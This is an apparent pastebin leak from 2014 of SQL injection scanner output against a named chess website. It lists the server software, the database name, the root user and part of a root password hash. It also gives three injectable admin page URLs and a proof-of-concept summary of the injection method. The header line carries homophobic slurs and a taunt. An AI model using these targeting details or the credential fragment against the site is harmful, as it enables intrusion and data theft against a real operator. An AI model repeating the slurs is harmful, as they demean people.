http://xqfan.com/

a guest
Nov 1st, 2014
  1. http://xqfan.com/ AKA retarded chess games leaked for no reason , enjoy faggots
  2. Version 5.5.38-0ubuntu0.12.04.1
  3. Server Apache/2.2.22 (Ubuntu)
  4. OS debian-linux-gnu
  5. user root@localhost
  6. Database xqfan
  7. half of* root_PasswordHash *317E9221C707F3F74E0B9CAA6AEB40AA63521E48
  8. ----------------------------------------------------------------------------------
  9.  
  10. Vulnerability Result
  11.  
  12. No. 1
  13. ReferURL http://xqfan.com/vn/admin1.php?id=622
  14. Parameter id=622
  15. Type Integer
  16. KWordActionURL Hướng
  17. Vulnerability URL SQL INJECTION
  18. ----------------------------------------------------------------------------------
  19.  
  20. No. 2
  21. ReferURL http://xqfan.com/vn/admin1.php?id=99999999
  22. Parameter id=99999999
  23. Type Integer
  24. KWordActionURL thuật
  25. Vulnerability URL SQL INJECTION
  26. ----------------------------------------------------------------------------------
  27.  
  28. No. 3
  29. ReferURL http://xqfan.com/vn/admin1.php?id=
  30. Parameter id=
  31. Type Search
  32. KWordActionURL ChessFriends
  33. Vulnerability URL SQL INJECTION
  34. ----------------------------------------------------------------------------------
  35.  
  36. Proof Of Concept - SQL INJECTION
  37.  
  38. Parameter Value
  39. URL http://xqfan.com/vn/admin1.php?id=622
  40. RequestType GET
  41. DatabaseType MySQL
  42. InjectionType Integer
  43. GettingDataBy FieldEcho
  44. ----------------------------------------------------------------------------------
  45.  
  46. Proof Of Concept - Getting Database Structure
  47.  
  48. DB-----Table---Column